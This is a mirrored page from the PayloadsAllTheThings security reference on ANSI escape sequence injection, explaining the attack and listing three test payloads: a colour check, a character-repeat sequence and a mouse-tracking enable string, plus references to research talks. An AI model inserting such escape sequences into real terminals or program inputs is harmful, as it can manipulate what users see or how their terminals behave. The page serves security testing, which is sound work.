ch0ic3/PayloadsAllTheThings

mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-22 11:18:50 +00:00

Siddharth Dushantha b1b5e06189 added ANSI Escape Sequence Injection

2024-05-20 23:00:11 +02:00

1.5 KiB

Raw Blame History

ANSI Escape Sequence Injection

An ANSI escape sequence injection attack involved inserting ANSI escape sequences into a program that later renders these sequences without filtering them out. This can lead to various issues such as manipulation of the terminal output or execution of unintended commands

Summary

Exploit code or POC
References

Exploit code or POC

Note: The payloads below can be tested in your terminal using echo -e <payload> or printf <payload>

Basic payload to check if ANSI escape sequences get are filtered out or not. If they are not filtered, THIS IS GREEN will be shown in green color.

Hello \033[32mTHIS IS GREEN\033[0m\007

Repeat a character X times. The example below, ✌ will be repeated 10 times.

✌\033[10;b\007

Capture mouse movements and output the coordinates into the terminal.

\033[?1001h\033[?1002h\033[?1003h\033[?1004h\033[?1005h\033[?1006h\033[?1007h\033[?1015h\033[?10016h\

References

Weaponizing Plain Text ANSI Escape Sequences as a Forensic Nightmare - Fredrik (STÖK) Alexandersson
Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters - Eviatar Gerzi
ANSI Terminal security in 2023 and finding 10 CVEs - David Leadbeater